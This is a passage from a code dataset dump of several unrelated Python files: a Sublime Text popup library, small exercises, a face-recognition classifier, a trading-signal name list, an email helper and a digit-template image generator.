border_size=1, check_size=4, max_colors=5, alpha=False, border_map=0xF\n):\n \"\"\"Color box.\"\"\"\n\n return colorbox.color_box(\n colors, border, border2, height, width,\n border_size, check_size, max_colors, alpha, border_map\n )\n\n\ndef color_box_raw(\n colors, border=\"#000000ff\", border2=None, height=32, width=32,\n border_size=1, check_size=4, max_colors=5, alpha=False, border_map=0xF\n):\n \"\"\"Color box raw.\"\"\"\n\n return colorbox.color_box_raw(\n colors, border, border2, height, width,\n border_size, check_size, max_colors, alpha, border_map\n )\n\n\ndef tint(img, color, opacity=255, height=None, width=None):\n \"\"\"Tint the image.\"\"\"\n\n if isinstance(img, str):\n try:\n img = sublime.load_binary_resource(img)\n except Exception:\n _log('Could not open binary file!')\n _debug(traceback.format_exc(), ERROR)\n return ''\n return imagetint.tint(img, color, opacity, height, width)\n\n\ndef tint_raw(img, color, opacity=255):\n \"\"\"Tint the image.\"\"\"\n\n if isinstance(img, str):\n try:\n img = sublime.load_binary_resource(img)\n except Exception:\n _log('Could not open binary file!')\n _debug(traceback.format_exc(), ERROR)\n return ''\n return imagetint.tint_raw(img, color, opacity)\n\n\ndef get_language_from_view(view):\n \"\"\"Guess current language from view.\"\"\"\n\n lang = None\n user_map = sublime.load_settings('Preferences.sublime-settings').get('mdpopups.sublime_user_lang_map', {})\n syntax = os.path.splitext(view.settings().get('syntax').replace('Packages/', '', 1))[0]\n keys = set(list(lang_map.keys()) + list(user_map.keys()))\n for key in keys:\n v1 = lang_map.get(key, (tuple(), tuple()))[1]\n v2 = user_map.get(key, (tuple(), tuple()))[1]\n if syntax in (tuple(v2) + v1):\n lang = key\n break\n return lang\n\n\ndef syntax_highlight(view, src, language=None, inline=False):\n \"\"\"Syntax highlighting for code.\"\"\"\n\n try:\n if _get_setting('mdpopups.use_sublime_highlighter'):\n highlighter = _get_sublime_highlighter(view)\n code = highlighter.syntax_highlight(src, language, inline=inline)\n else:\n code = pyg_syntax_hl(src, language, inline=inline)\n except Exception:\n code = src\n _log('Failed to highlight code!')\n _debug(traceback.format_exc(), ERROR)\n\n return code\n\n\ndef scope2style(view, scope, selected=False, explicit_background=False):\n \"\"\"Convert the scope to a style.\"\"\"\n\n style = {\n 'color': None,\n 'background': None,\n 'style': ''\n }\n obj = _get_scheme(view)[0]\n style_obj = obj.guess_style(scope, selected, explicit_background)\n style['color'] = style_obj.fg_simulated\n style['background'] = style_obj.bg_simulated\n style['style'] = style_obj.style\n return style\n\n\ndef clear_cache():\n \"\"\"Clear cache.\"\"\"\n\n _clear_cache()\n\n\ndef hide_popup(view):\n \"\"\"Hide the popup.\"\"\"\n\n view.hide_popup()\n\n\ndef update_popup(\n view, content, md=True, css=None, wrapper_class=None,\n template_vars=None, template_env_options=None, nl2br=True\n):\n \"\"\"Update the popup.\"\"\"\n\n disabled = _get_setting('mdpopups.disable', False)\n if disabled:\n _debug('Popups disabled', WARNING)\n return\n\n try:\n html = _create_html(\n view, content, md, css, css_type=POPUP, wrapper_class=wrapper_class,\n template_vars=template_vars, template_env_options=template_env_options, nl2br=nl2br\n )\n except Exception:\n _log(traceback.format_exc())\n html = IDK\n\n view.update_popup(html)\n\n\ndef show_popup(\n view, content, md=True, css=None,\n flags=0, location=-1, max_width=320, max_height=240,\n on_navigate=None, on_hide=None, wrapper_class=None,\n template_vars=None, template_env_options=None, nl2br=True\n):\n \"\"\"Parse the color scheme if needed and show the styled pop-up.\"\"\"\n\n disabled = _get_setting('mdpopups.disable', False)\n if disabled:\n _debug('Popups disabled', WARNING)\n return\n\n if not _can_show(view, location):\n return\n\n try:\n html = _create_html(\n view, content, md, css, css_type=POPUP, wrapper_class=wrapper_class,\n template_vars=template_vars, template_env_options=template_env_options,\n nl2br=nl2br\n )\n except Exception:\n _log(traceback.format_exc())\n html = IDK\n\n view.show_popup(\n html, flags=flags, location=location, max_width=max_width,\n max_height=max_height, on_navigate=on_navigate, on_hide=on_hide\n )\n\n\ndef is_popup_visible(view):\n \"\"\"Check if popup is visible.\"\"\"\n\n return view.is_popup_visible()\n\n\nif PHANTOM_SUPPORT:\n def add_phantom(\n view, key, region, content, layout, md=True,\n css=None, on_navigate=None, wrapper_class=None,\n template_vars=None, template_env_options=None, nl2br=True\n ):\n \"\"\"Add a phantom and return phantom id.\"\"\"\n\n disabled = _get_setting('mdpopups.disable', False)\n if disabled:\n _debug('Phantoms disabled', WARNING)\n return\n\n try:\n html = _create_html(\n view, content, md, css, css_type=PHANTOM, wrapper_class=wrapper_class,\n template_vars=template_vars, template_env_options=template_env_options,\n nl2br=nl2br\n )\n except Exception:\n _log(traceback.format_exc())\n html = IDK\n\n return view.add_phantom(key, region, html, layout, on_navigate)\n\n def erase_phantoms(view, key):\n \"\"\"Erase phantoms.\"\"\"\n\n view.erase_phantoms(key)\n\n def erase_phantom_by_id(view, pid):\n \"\"\"Erase phantom by ID.\"\"\"\n\n view.erase_phantom_by_id(pid)\n\n def query_phantom(view, pid):\n \"\"\"Query phantom.\"\"\"\n\n return view.query_phantom(pid)\n\n def query_phantoms(view, pids):\n \"\"\"Query phantoms.\"\"\"\n\n return view.query_phantoms(pids)\n\n class Phantom(sublime.Phantom):\n \"\"\"A phantom object.\"\"\"\n\n def __init__(\n self, region, content, layout, md=True,\n css=None, on_navigate=None, wrapper_class=None,\n template_vars=None, template_env_options=None, nl2br=True\n ):\n \"\"\"Initialize.\"\"\"\n\n super().__init__(region, content, layout, on_navigate)\n self.md = md\n self.css = css\n self.wrapper_class = wrapper_class\n self.template_vars = template_vars\n self.template_env_options = template_env_options\n self.nl2br = nl2br\n\n def __eq__(self, rhs):\n \"\"\"Check if phantoms are equal.\"\"\"\n\n # Note that self.id is not considered\n return (\n self.region == rhs.region and self.content == rhs.content and\n self.layout == rhs.layout and self.on_navigate == rhs.on_navigate and\n self.md == rhs.md and self.css == rhs.css and self.nl2br == rhs.nl2br and\n self.wrapper_class == rhs.wrapper_class and self.template_vars == rhs.template_vars and\n self.template_env_options == rhs.template_env_options\n )\n\n class PhantomSet(sublime.PhantomSet):\n \"\"\"Object that allows easy updating of phantoms.\"\"\"\n\n def __init__(self, view, key=\"\"):\n \"\"\"Initialize.\"\"\"\n\n super().__init__(view, key)\n\n def __del__(self):\n \"\"\"Delete phantoms.\"\"\"\n\n for p in self.phantoms:\n erase_phantom_by_id(self.view, p.id)\n\n def update(self, new_phantoms):\n \"\"\"Update the list of phantoms that exist in the text buffer with their current location.\"\"\"\n\n regions = query_phantoms(self.view, [p.id for p in self.phantoms])\n for i in range(len(regions)):\n self.phantoms[i].region = regions[i]\n\n count = 0\n for p in new_phantoms:\n if not isinstance(p, Phantom):\n # Convert sublime.Phantom to mdpopups.Phantom\n p = Phantom(\n p.region, p.content, p.layout,\n md=False, css=None, on_navigate=p.on_navigate, wrapper_class=None,\n template_vars=None, template_env_options=None, nl2br=False\n )\n new_phantoms[count] = p\n try:\n # Phantom already exists, copy the id from the current one\n idx = self.phantoms.index(p)\n p.id = self.phantoms[idx].id\n except ValueError:\n p.id = add_phantom(\n self.view,\n self.key,\n p.region,\n p.content,\n p.layout,\n p.md,\n p.css,\n p.on_navigate,\n p.wrapper_class,\n p.template_vars,\n p.template_env_options,\n p.nl2br\n )\n count += 1\n\n for p in self.phantoms:\n # if the region is -1, then it's already been deleted, no need to call erase\n if p not in new_phantoms and p.region != sublime.Region(-1):\n erase_phantom_by_id(self.view, p.id)\n\n self.phantoms = new_phantoms\n","sub_path":"Data/Packages/mdpopups/st3/mdpopups/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":20908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"501158749","text":"'''\n5.Write a Python program to square and cube every number\nin a given list of integers using Lambda.\n'''\n\nList=list(map(int,input(\"Enter list elements:\").strip().split()))\n\nsquare = list(map(lambda x : x**2,List))\nprint(square)\ncube = list(map(lambda x : x**3,List))\nprint(cube)","sub_path":"Python_Day8/Q5.py","file_name":"Q5.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"449680522","text":"from sklearn.svm import SVC\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.preprocessing import LabelEncoder\nimport pickle as pkl\nimport numpy as np\nimport cv2\nfrom embedding import EmbedderGenerator\nfrom termcolor import colored\n\n\nclass Classify():\n\n def __init__(self, classifier='svm'):\n if classifier == \"knn\":\n self.classifier = KNeighborsClassifier(n_neighbors=4)\n self.classifier_name = classifier\n elif classifier == 'svm':\n self.classifier = SVC(C=1.0, kernel=\"linear\", probability=True)\n self.classifier_name = classifier\n elif classifier == 'centroid':\n self.classifier = classifier\n\n def train(self, data):\n names = []\n embeddings = []\n for key in data:\n for embedding in data[key].T:\n print(embedding.shape)\n embeddings.append(embedding)\n names.append(key)\n\n self.le = LabelEncoder()\n labels = self.le.fit_transform(names)\n print(labels)\n self.classifier.fit(embeddings, labels)\n\n self.save()\n\n print(\"Training Done\")\n\n def eval(self, data, test_embedding):\n if self.classifier == 'centroid':\n names = list(data.keys())\n prob = []\n for name in names:\n centroid = np.mean(data[name], axis=-1)\n dist = np.linalg.norm((test_embedding - centroid), 2)\n prob.append(1 - (1/(1+np.exp(-dist))))\n\n prob = np.array(prob)\n idx = np.argmax(prob)\n print(prob)\n print(idx)\n print(names)\n return names[idx]\n\n elif self.classifier_name == 'svm':\n try:\n classifier = pkl.load(open(\"./pickle/classifier\", \"rb\"))\n label_encoder = pkl.load(open(\"./pickle/label_encoder\", \"rb\"))\n except:\n print(f\"{colored('[Error]', 'red')} Could not load model\")\n print(\"exiting\")\n exit(0)\n\n preds = classifier.predict_proba([test_embedding])[0]\n idx = np.argmax(preds)\n proba = preds[idx]\n name = label_encoder.classes_[idx]\n return name\n\n def save(self):\n f = open(\"./pickle/classifier\", \"wb\")\n pkl.dump(self.classifier, f)\n f.close()\n\n f = open(\"./pickle/label_encoder\", \"wb\")\n pkl.dump(self.le, f)\n f.close()\n\n\nif __name__ == \"__main__\":\n\n import os\n try:\n data = pkl.load(open(\"./pickle/data\", \"rb\"))\n except:\n print(\"Error loading file\")\n exit(0)\n\n # path = \"./dataset/test/20190718_094418.jpg\"\n # classify = Classify()\n # if not (os.path.isfile(\"classifier\")):\n # classify.train(data)\n # else:\n # embedder = EmbedderGenerator()\n # embedding = embedder.predict(cv2.imread(path))\n # print(embedding.shape)\n # print(f\"This is {classify.eval(None, embedding)}\")\n\n cap = cv2.VideoCapture(0)\n while True:\n grabbed, frame = cap.read()\n\n if not grabbed:\n print(f\"{colored('[Info]', 'blue')} Exiting\")\n exit(0)\n\n classifier = Classify()\n if not os.path.isfile(\"classifier\"):\n classifier.train(data)\n else:\n embedder = EmbedderGenerator()\n embedding = embedder.predict(frame)\n print(f\"This is {classify.eval(none, embedding)}\")\n cv2.imshow(\"Frame\", frame)\n if cv2.waitKey(1) & 0xFF:\n print(f\"{colored('[Info]', 'blue')} Exiting\")\n exit(0)\n","sub_path":"Face/recognize.py","file_name":"recognize.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"32396805","text":"for _ in range(int(input())):\n n = int(input())\n flag=1\n while(n):\n if(n&1 and (n>>1)&1):\n flag=0\n break\n else:\n n>>=1\n if flag:\n print(\"1\")\n else:\n print(\"0\") ","sub_path":"dsa/bit magic/number_is_sparse_or_not.py","file_name":"number_is_sparse_or_not.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"513450084","text":"# coding: utf-8\n\nfrom .analyze import CZSC\nfrom .factors import CzscFactors\nfrom .utils.ta import SMA, EMA, MACD, KDJ\n\n__version__ = \"0.6.8\"\n__author__ = \"zengbin93\"\n__email__ = \"zeng_bin8888@163.com\"\n\ndef get_s_names():\n \"\"\"获取所有信号和因子的名称\"\"\"\n assert __version__ == '0.6.8'\n s_name = [\n '1分钟_倒1方向',\n '1分钟_倒1长度',\n '1分钟_倒1涨跌幅',\n '1分钟_倒1拟合优度',\n '1分钟_倒1近五笔最高点',\n '1分钟_倒1近五笔最低点',\n '1分钟_倒1近七笔最高点',\n '1分钟_倒1近七笔最低点',\n '1分钟_倒1近九笔最高点',\n '1分钟_倒1近九笔最低点',\n '1分钟_倒1近十一笔最高点',\n '1分钟_倒1近十一笔最低点',\n '1分钟_倒1近十三笔最高点',\n '1分钟_倒1近十三笔最低点',\n '1分钟_倒1近十五笔最高点',\n '1分钟_倒1近十五笔最低点',\n '1分钟_倒2方向',\n '1分钟_倒2长度',\n '1分钟_倒2涨跌幅',\n '1分钟_倒2拟合优度',\n '1分钟_倒3方向',\n '1分钟_倒3长度',\n '1分钟_倒3涨跌幅',\n '1分钟_倒3拟合优度',\n '1分钟_倒4方向',\n '1分钟_倒4长度',\n '1分钟_倒4涨跌幅',\n '1分钟_倒4拟合优度',\n '1分钟_倒5方向',\n '1分钟_倒5长度',\n '1分钟_倒5涨跌幅',\n '1分钟_倒5拟合优度',\n '1分钟_倒1五笔',\n '1分钟_倒2五笔',\n '1分钟_倒3五笔',\n '1分钟_倒4五笔',\n '1分钟_倒5五笔',\n '1分钟_倒1七笔',\n '1分钟_倒2七笔',\n '1分钟_倒3七笔',\n '1分钟_倒4七笔',\n '1分钟_倒5七笔',\n '1分钟_倒1九笔',\n '1分钟_倒2九笔',\n '1分钟_倒3九笔',\n '1分钟_倒4九笔',\n '1分钟_倒5九笔',\n '5分钟_倒1方向',\n '5分钟_倒1长度',\n '5分钟_倒1涨跌幅',\n '5分钟_倒1拟合优度',\n '5分钟_倒1近五笔最高点',\n '5分钟_倒1近五笔最低点',\n '5分钟_倒1近七笔最高点',\n '5分钟_倒1近七笔最低点',\n '5分钟_倒1近九笔最高点',\n '5分钟_倒1近九笔最低点',\n '5分钟_倒1近十一笔最高点',\n '5分钟_倒1近十一笔最低点',\n '5分钟_倒1近十三笔最高点',\n '5分钟_倒1近十三笔最低点',\n '5分钟_倒1近十五笔最高点',\n '5分钟_倒1近十五笔最低点',\n '5分钟_倒2方向',\n '5分钟_倒2长度',\n '5分钟_倒2涨跌幅',\n '5分钟_倒2拟合优度',\n '5分钟_倒3方向',\n '5分钟_倒3长度',\n '5分钟_倒3涨跌幅',\n '5分钟_倒3拟合优度',\n '5分钟_倒4方向',\n '5分钟_倒4长度',\n '5分钟_倒4涨跌幅',\n '5分钟_倒4拟合优度',\n '5分钟_倒5方向',\n '5分钟_倒5长度',\n '5分钟_倒5涨跌幅',\n '5分钟_倒5拟合优度',\n '5分钟_倒1五笔',\n '5分钟_倒2五笔',\n '5分钟_倒3五笔',\n '5分钟_倒4五笔',\n '5分钟_倒5五笔',\n '5分钟_倒1七笔',\n '5分钟_倒2七笔',\n '5分钟_倒3七笔',\n '5分钟_倒4七笔',\n '5分钟_倒5七笔',\n '5分钟_倒1九笔',\n '5分钟_倒2九笔',\n '5分钟_倒3九笔',\n '5分钟_倒4九笔',\n '5分钟_倒5九笔',\n '15分钟_倒1方向',\n '15分钟_倒1长度',\n '15分钟_倒1涨跌幅',\n '15分钟_倒1拟合优度',\n '15分钟_倒1近五笔最高点',\n '15分钟_倒1近五笔最低点',\n '15分钟_倒1近七笔最高点',\n '15分钟_倒1近七笔最低点',\n '15分钟_倒1近九笔最高点',\n '15分钟_倒1近九笔最低点',\n '15分钟_倒1近十一笔最高点',\n '15分钟_倒1近十一笔最低点',\n '15分钟_倒1近十三笔最高点',\n '15分钟_倒1近十三笔最低点',\n '15分钟_倒1近十五笔最高点',\n '15分钟_倒1近十五笔最低点',\n '15分钟_倒2方向',\n '15分钟_倒2长度',\n '15分钟_倒2涨跌幅',\n '15分钟_倒2拟合优度',\n '15分钟_倒3方向',\n '15分钟_倒3长度',\n '15分钟_倒3涨跌幅',\n '15分钟_倒3拟合优度',\n '15分钟_倒4方向',\n '15分钟_倒4长度',\n '15分钟_倒4涨跌幅',\n '15分钟_倒4拟合优度',\n '15分钟_倒5方向',\n '15分钟_倒5长度',\n '15分钟_倒5涨跌幅',\n '15分钟_倒5拟合优度',\n '15分钟_倒1五笔',\n '15分钟_倒2五笔',\n '15分钟_倒3五笔',\n '15分钟_倒4五笔',\n '15分钟_倒5五笔',\n '15分钟_倒1七笔',\n '15分钟_倒2七笔',\n '15分钟_倒3七笔',\n '15分钟_倒4七笔',\n '15分钟_倒5七笔',\n '15分钟_倒1九笔',\n '15分钟_倒2九笔',\n '15分钟_倒3九笔',\n '15分钟_倒4九笔',\n '15分钟_倒5九笔',\n '30分钟_倒1方向',\n '30分钟_倒1长度',\n '30分钟_倒1涨跌幅',\n '30分钟_倒1拟合优度',\n '30分钟_倒1近五笔最高点',\n '30分钟_倒1近五笔最低点',\n '30分钟_倒1近七笔最高点',\n '30分钟_倒1近七笔最低点',\n '30分钟_倒1近九笔最高点',\n '30分钟_倒1近九笔最低点',\n '30分钟_倒1近十一笔最高点',\n '30分钟_倒1近十一笔最低点',\n '30分钟_倒1近十三笔最高点',\n '30分钟_倒1近十三笔最低点',\n '30分钟_倒1近十五笔最高点',\n '30分钟_倒1近十五笔最低点',\n '30分钟_倒2方向',\n '30分钟_倒2长度',\n '30分钟_倒2涨跌幅',\n '30分钟_倒2拟合优度',\n '30分钟_倒3方向',\n '30分钟_倒3长度',\n '30分钟_倒3涨跌幅',\n '30分钟_倒3拟合优度',\n '30分钟_倒4方向',\n '30分钟_倒4长度',\n '30分钟_倒4涨跌幅',\n '30分钟_倒4拟合优度',\n '30分钟_倒5方向',\n '30分钟_倒5长度',\n '30分钟_倒5涨跌幅',\n '30分钟_倒5拟合优度',\n '30分钟_倒1五笔',\n '30分钟_倒2五笔',\n '30分钟_倒3五笔',\n '30分钟_倒4五笔',\n '30分钟_倒5五笔',\n '30分钟_倒1七笔',\n '30分钟_倒2七笔',\n '30分钟_倒3七笔',\n '30分钟_倒4七笔',\n '30分钟_倒5七笔',\n '30分钟_倒1九笔',\n '30分钟_倒2九笔',\n '30分钟_倒3九笔',\n '30分钟_倒4九笔',\n '30分钟_倒5九笔',\n '60分钟_倒1方向',\n '60分钟_倒1长度',\n '60分钟_倒1涨跌幅',\n '60分钟_倒1拟合优度',\n '60分钟_倒1近五笔最高点',\n '60分钟_倒1近五笔最低点',\n '60分钟_倒1近七笔最高点',\n '60分钟_倒1近七笔最低点',\n '60分钟_倒1近九笔最高点',\n '60分钟_倒1近九笔最低点',\n '60分钟_倒1近十一笔最高点',\n '60分钟_倒1近十一笔最低点',\n '60分钟_倒1近十三笔最高点',\n '60分钟_倒1近十三笔最低点',\n '60分钟_倒1近十五笔最高点',\n '60分钟_倒1近十五笔最低点',\n '60分钟_倒2方向',\n '60分钟_倒2长度',\n '60分钟_倒2涨跌幅',\n '60分钟_倒2拟合优度',\n '60分钟_倒3方向',\n '60分钟_倒3长度',\n '60分钟_倒3涨跌幅',\n '60分钟_倒3拟合优度',\n '60分钟_倒4方向',\n '60分钟_倒4长度',\n '60分钟_倒4涨跌幅',\n '60分钟_倒4拟合优度',\n '60分钟_倒5方向',\n '60分钟_倒5长度',\n '60分钟_倒5涨跌幅',\n '60分钟_倒5拟合优度',\n '60分钟_倒1五笔',\n '60分钟_倒2五笔',\n '60分钟_倒3五笔',\n '60分钟_倒4五笔',\n '60分钟_倒5五笔',\n '60分钟_倒1七笔',\n '60分钟_倒2七笔',\n '60分钟_倒3七笔',\n '60分钟_倒4七笔',\n '60分钟_倒5七笔',\n '60分钟_倒1九笔',\n '60分钟_倒2九笔',\n '60分钟_倒3九笔',\n '60分钟_倒4九笔',\n '60分钟_倒5九笔',\n '日线_倒1方向',\n '日线_倒1长度',\n '日线_倒1涨跌幅',\n '日线_倒1拟合优度',\n '日线_倒1近五笔最高点',\n '日线_倒1近五笔最低点',\n '日线_倒1近七笔最高点',\n '日线_倒1近七笔最低点',\n '日线_倒1近九笔最高点',\n '日线_倒1近九笔最低点',\n '日线_倒1近十一笔最高点',\n '日线_倒1近十一笔最低点',\n '日线_倒1近十三笔最高点',\n '日线_倒1近十三笔最低点',\n '日线_倒1近十五笔最高点',\n '日线_倒1近十五笔最低点',\n '日线_倒2方向',\n '日线_倒2长度',\n '日线_倒2涨跌幅',\n '日线_倒2拟合优度',\n '日线_倒3方向',\n '日线_倒3长度',\n '日线_倒3涨跌幅',\n '日线_倒3拟合优度',\n '日线_倒4方向',\n '日线_倒4长度',\n '日线_倒4涨跌幅',\n '日线_倒4拟合优度',\n '日线_倒5方向',\n '日线_倒5长度',\n '日线_倒5涨跌幅',\n '日线_倒5拟合优度',\n '日线_倒1五笔',\n '日线_倒2五笔',\n '日线_倒3五笔',\n '日线_倒4五笔',\n '日线_倒5五笔',\n '日线_倒1七笔',\n '日线_倒2七笔',\n '日线_倒3七笔',\n '日线_倒4七笔',\n '日线_倒5七笔',\n '日线_倒1九笔',\n '日线_倒2九笔',\n '日线_倒3九笔',\n '日线_倒4九笔',\n '日线_倒5九笔',\n '日线笔因子',\n '日线笔结束',\n '60分钟笔因子',\n '60分钟笔结束',\n '30分钟笔因子',\n '30分钟笔结束',\n '15分钟笔因子',\n '15分钟笔结束',\n '5分钟笔结束'\n ]\n return s_name\n\n","sub_path":"czsc/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":10393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"130713861","text":"import smtplib\nfrom app.src.util.html import strip_tags\nfrom threading import Thread\nfrom flask import current_app\nfrom flask_mail import Message\nfrom app import mail\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom string import Template\nfrom app.src.util.html import strip_tags\n\ndef send_async_email(app, msg):\n with app.app_context():\n mail.send(msg)\n\ndef send_sample_email(user, recipient_name, subject, template):\n html_body = popuplateContactName(template, recipient_name)\n text_body = strip_tags(html_body)\n # set up the SMTP server\n s = smtplib.SMTP(host=user.user_contact.marketing_email_host, port=user.user_contact.marketing_email_port)\n s.starttls()\n s.login(user.user_contact.marketing_email, user.user_contact.marketing_email_password)\n send_email(subject, user.user_contact.marketing_email, [user.email], text_body, html_body, smtp=s)\n # Terminate the SMTP session and close the connection\n s.quit()\n\ndef send_email(subject, sender, recipients, text_body, html_body,\n attachments=None, sync=False, smtp=None):\n\n # setup the parameters of the message\n msg = Message(subject, sender=sender, recipients=recipients)\n msg.body = text_body\n msg.html = html_body\n if attachments:\n for attachment in attachments:\n msg.attach(*attachment)\n\n #msg = MIMEMultipart('alternative')\n #msg['From']=sender.email\n #msg['To']=recipient.email\n #msg['Subject']=subject\n #part1 = MIMEText(text_body, 'plain')\n #part2 = MIMEText(html_body, 'html')\n\n # Attach parts into message container.\n # According to RFC 2046, the last part of a multipart message, in this case\n # the HTML message, is best and preferred.\n #msg.attach(part1)\n #msg.attach(part2)\n\n if smtp is not None:\n #send the message via the SMTP server set up earlier.\n smtp.sendmail(sender, [recipients], msg.as_string())\n elif sync:\n mail.send(msg)\n else:\n Thread(target=send_async_email,\n args=(current_app._get_current_object(), msg)).start()\n del msg\n\ndef popuplateContactName(email_template, recipient_name):\n s = Template(email_template)\n data = dict(first_name=recipient_name)\n return s.safe_substitute(data)\n","sub_path":"app/src/email/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"126577475","text":"# Creates digit templates with digit randomly placed on the template\nimport os\nimport re\nimport cv2\nimport shutil\nimport random\nimport numpy as np\nfrom image_processing.constants import ROOT_DIR\n\nDATA_DIR_BACKGROUNDS = ROOT_DIR + \"\\\\data\\\\background\"\nbackgrounds = os.listdir(DATA_DIR_BACKGROUNDS)\n\nDATA_DIR_CLASSIFIERS = ROOT_DIR + \"\\\\data\\\\templates\"\ndigits = os.listdir(DATA_DIR_CLASSIFIERS)\n\nDATA_DIR_RESULTS = ROOT_DIR + \"\\\\data\\\\random_templates\"\n\n\ndef create_background(rows, columns):\n \"\"\"Creates a background to place the digits on\"\"\"\n background_number = random.randint(0, len(backgrounds) - 1)\n background = cv2.imread(str(DATA_DIR_BACKGROUNDS) + \"\\\\\" + backgrounds[background_number], 0)\n\n (values, counts) = np.unique(background, return_counts=True)\n ind = np.argmax(counts)\n\n base_array = np.tile(values[ind], (rows, columns))\n\n avg = values[ind]\n minimum = np.min(background)\n minimum = int(minimum) - int(avg)\n maximum = np.max(background)\n maximum = int(maximum) - int(avg)\n\n base_array = np.asarray(base_array + np.random.randint(minimum, maximum, (rows, columns)), dtype=np.uint8)\n base_array = cv2.GaussianBlur(base_array, (15, 15), 3)\n\n return base_array\n\n\ndef create_binary(img_digit):\n \"\"\"Creates a binary image \"\"\"\n img_digit_hsv = cv2.cvtColor(img_digit, cv2.COLOR_BGR2HSV)\n\n clahe = cv2.createCLAHE(clipLimit=3.0, tileGridSize=(3, 3))\n channels = cv2.split(img_digit_hsv)\n img_digit_value = clahe.apply(channels[2])\n\n img_digit_value_normalized = cv2.normalize(img_digit_value, None, -1, 1, cv2.NORM_MINMAX, cv2.CV_32F)\n img_digit_binary = cv2.inRange(img_digit_value_normalized, -1, .5)\n\n return img_digit_binary\n\n\ndef find_contour_digit(img_binary):\n \"\"\"Get the biggest region from the binary image\"\"\"\n contours, hir = cv2.findContours(img_binary, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n areas = [cv2.contourArea(c) for c in contours]\n max_index = np.argmax(areas)\n cnt = [contours[max_index]]\n\n x, y, w, h = cv2.boundingRect(contours[max_index])\n\n # Create mask to draw the contour on\n (W, H) = img_binary.shape[:2]\n cnt_canvas = np.zeros((W, H), np.uint8)\n cv2.drawContours(cnt_canvas, cnt, -1, 1, -1)\n\n return cnt_canvas, x, y, w, h\n\n\ndef create_digit_masks(img_digit):\n \"\"\"Creates a mask of the digit\"\"\"\n img_digit_binary = create_binary(img_digit)\n img_digit_gray = cv2.cvtColor(img_digit, cv2.COLOR_BGR2GRAY)\n\n mask_digit, x, y, w, h = find_contour_digit(img_digit_binary)\n img_digit_gray *= mask_digit\n\n img_digit_gray[img_digit_gray > 250] = 0\n mask_digit *= img_digit_gray\n mask_digit[mask_digit > 0] = 1\n\n return mask_digit[y:y + h, x:x + w], img_digit_gray[y:y + h, x:x + w]\n\n\ndef place_digits(background, H, W):\n \"\"\"Randomly places the digits on a background\"\"\"\n # Digit selection\n random_number = random.randint(0, len(digits) - 1) # generate random int\n img_loc = str(DATA_DIR_CLASSIFIERS) + \"\\\\\" + digits[random_number] # use random int to load a template\n img_first_digit = cv2.imread(img_loc)\n img_first_digit = cv2.resize(img_first_digit, (H, W))\n\n mask_first_digit, img_first_digit_gray = create_digit_masks(img_first_digit) # create masks of the digit\n\n # Addition of the second digit based on the digit that was chosen before\n pattern = r\"([0-9]).*.jpg\"\n name = re.findall(pattern, digits[random_number]) # digit is specified in the file name\n\n if int(name[0]) is 9:\n second_digit = 0\n else:\n second_digit = int(name[0]) + 1\n\n img_loc = str(DATA_DIR_CLASSIFIERS) + \"\\\\\" + str(second_digit) + \".jpg\"\n img_second_digit = cv2.imread(img_loc)\n img_second_digit = cv2.resize(img_second_digit, (H, W))\n\n mask_second_digit, img_second_digit_gray = create_digit_masks(img_second_digit) # create masks of the digit\n\n # Use both maks and images of the digits to combine them in two arrays comparable to the representation in the \\\n # tally counter\n\n height_first_digit, width_first_digit = mask_first_digit.shape[:2]\n height_second_digit, width_second_digit = mask_second_digit.shape[:2]\n\n # Resize the digit so that they have equal heights\n ratio_between_digits = height_first_digit / height_second_digit\n height_second_digit = height_first_digit\n width_second_digit *= ratio_between_digits\n width_second_digit = int(width_second_digit)\n\n mask_second_digit = cv2.resize(mask_second_digit, (width_second_digit, height_second_digit)) * 0\n img_second_digit_gray = cv2.resize(img_second_digit_gray, (width_second_digit, height_second_digit)) * 0\n\n # Pad the smallest array with zeros for the concatenation of arrays\n if width_first_digit is width_second_digit:\n buffer = np.zeros((int(height_first_digit * .25), width_first_digit), np.uint8) # Spacing between digits\n elif width_first_digit > width_second_digit:\n padding_mask = np.zeros((height_first_digit, width_first_digit), np.uint8)\n padding_img = np.zeros((height_first_digit, width_first_digit), np.uint8)\n buffer = np.zeros((int(height_first_digit * .25), width_first_digit), np.uint8)\n if np.abs(width_first_digit - width_second_digit) > 2:\n start_pos = int((np.abs(width_first_digit - width_second_digit) / 2) - 1)\n else:\n start_pos = 0\n\n # Addition of the smallest digit arrays in the center of the padding arrays\n padding_mask[:, start_pos:start_pos + width_second_digit] = mask_second_digit\n mask_second_digit = padding_mask\n padding_img[:, start_pos:start_pos + width_second_digit] = img_second_digit_gray\n img_second_digit_gray = padding_img\n\n else:\n padding_mask = np.zeros((height_second_digit, width_second_digit), np.uint8)\n padding_img = np.zeros((height_second_digit, width_second_digit), np.uint8)\n buffer = np.zeros((int(height_second_digit * .25), width_second_digit), np.uint8)\n if np.abs(width_first_digit - width_second_digit) > 2:\n start_pos = int((np.abs(width_first_digit - width_second_digit) / 2) - 1)\n else:\n start_pos = 0\n\n padding_mask[:, start_pos:start_pos + width_first_digit] = mask_first_digit\n mask_first_digit = padding_mask\n padding_img[:, start_pos:start_pos + width_first_digit] = img_first_digit_gray\n img_first_digit_gray = padding_img\n\n # Concatenation of the array containing the digit arrays\n mask_digits = np.concatenate([mask_first_digit, buffer, mask_second_digit])\n img_digits = np.concatenate([img_first_digit_gray, buffer, img_second_digit_gray])\n\n # Placement of the digits on the generated background\n height, width = img_digits.shape[:2]\n height_background, width_background = background.shape[:2]\n\n # 